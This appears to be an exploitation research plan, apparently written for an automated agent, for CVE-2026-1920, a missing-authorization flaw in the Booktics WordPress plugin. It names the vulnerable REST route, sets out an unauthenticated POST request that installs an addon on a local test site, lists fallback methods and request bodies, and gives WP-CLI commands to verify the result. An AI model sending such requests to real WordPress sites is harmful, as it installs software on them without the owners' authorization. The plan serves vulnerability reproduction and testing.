Exploitation Research Plan: CVE-2026-1920 - Booktics Unauthorized Addon Installation

1. Vulnerability Summary

The Booktics plugin (versions <= 1.0.16) contains a missing authorization vulnerability in its REST API implementation. Specifically, the Extension_Controller::update_item_permissions_check function fails to implement any capability checks (such as current_user_can('install_plugins')). This allows unauthenticated attackers to interact with the extension update endpoint, which triggers the installation of addon plugins.

2. Attack Vector Analysis

• REST API Endpoint: The vulnerability resides in the Extension_Controller class, which typically handles routes under the booktics/v1 namespace.
• Vulnerable Route: Likely POST or PUT requests to /wp-json/booktics/v1/extensions/(?P<slug>[\w-]+).
• Vulnerable Function: Extension_Controller::update_item_permissions_check.
• Authentication: None required (unauthenticated).
• Preconditions: The Booktics plugin must be active.

3. Code Flow

1. An HTTP request is sent to the REST API endpoint: POST /wp-json/booktics/v1/extensions/<addon-slug>.
2. The WordPress REST API server receives the request and matches it to the Extension_Controller routes.
3. The server calls the permission_callback for the update method: Extension_Controller::update_item_permissions_check.
4. Vulnerability Point: The update_item_permissions_check function returns true (or lacks a check), granting access to unauthenticated users.
5. The server then calls the action callback: Extension_Controller::update_item.
6. The update_item method processes the provided slug and initiates the installation/activation process for the specified addon.

4. Nonce Acquisition Strategy

According to the vulnerability description, there is missing authentication, implying the permission_callback returns true regardless of the user's login status.

In WordPress REST API architecture:

• If a request is sent without session cookies, the REST API does not require a _wpnonce (X-WP-Nonce) header, as there is no session to protect against CSRF.
• The API relies solely on the permission_callback to authorize the action.
• Since update_item_permissions_check is broken and returns true, an unauthenticated request with no cookies should bypass all security controls.

No nonce acquisition is required for this exploit.

5. Exploitation Strategy

The goal is to trigger the installation of an addon plugin (e.g., the Stripe addon referenced in assets/build/chunks/js/2031.js).

Step 1: Identify the exact REST route

The agent should first confirm the available REST routes for the plugin.

• Action: Use wp rest route list --regex="booktics" to find the namespace and extension endpoints.
• Inferred Route: booktics/v1/extensions/(?P<slug>[\w-]+)

Step 2: Identify valid addon slugs

Based on the source files, stripe is a valid extension.

• Potential Slugs: stripe, google-calendar, whatsapp, subscription.

Step 3: Execute the installation request

Send a POST request to the extension endpoint.

• Tool: http_request
• Method: POST
• URL: http://localhost:8080/wp-json/booktics/v1/extensions/stripe
• Headers: Content-Type: application/json
• Body: {} (The endpoint likely uses the slug from the URL to determine which plugin to install).

6. Test Data Setup

1. Install and activate Booktics version 1.0.16.
2. Ensure no Booktics addons (like Booktics Stripe) are currently installed or active.
3. Set the WordPress environment to allow outgoing requests if the plugin fetches addons from an external repository.

7. Expected Results

• The REST API should return a 200 OK or 201 Created status code.
• The response body should contain confirmation of the installation or the current status of the extension (e.g., {"status": "installed"}).
• A new plugin directory (e.g., wp-content/plugins/booktics-stripe/) should be created.

8. Verification Steps

After sending the HTTP request, verify the results using WP-CLI:

1. Check Plugin Directory:
   ls -la /var/www/html/wp-content/plugins/
   Confirm if a new addon folder (e.g., booktics-stripe) exists.
2. Check Plugin List:
   wp plugin list
   Confirm the status of the new addon. It may be installed but inactive, or installed and active depending on the update_item logic.
3. Check Plugin Options:
   wp option get booktics_extensions (inferred option name) to see if the internal state has been updated.

9. Alternative Approaches

If the POST request to /extensions/<slug> fails:

1. Try different methods: Some WordPress developers use GET for actions that should be POST, or require PUT. Try PUT /wp-json/booktics/v1/extensions/stripe.
2. Try different parameters: The endpoint might require a specific JSON body, such as {"action": "install"} or {"active": true}.
3. Discover through WP-CLI: Use wp rest route list to see if there are other endpoints related to "addons" or "modules" if "extensions" is not the correct term used in the final route registration.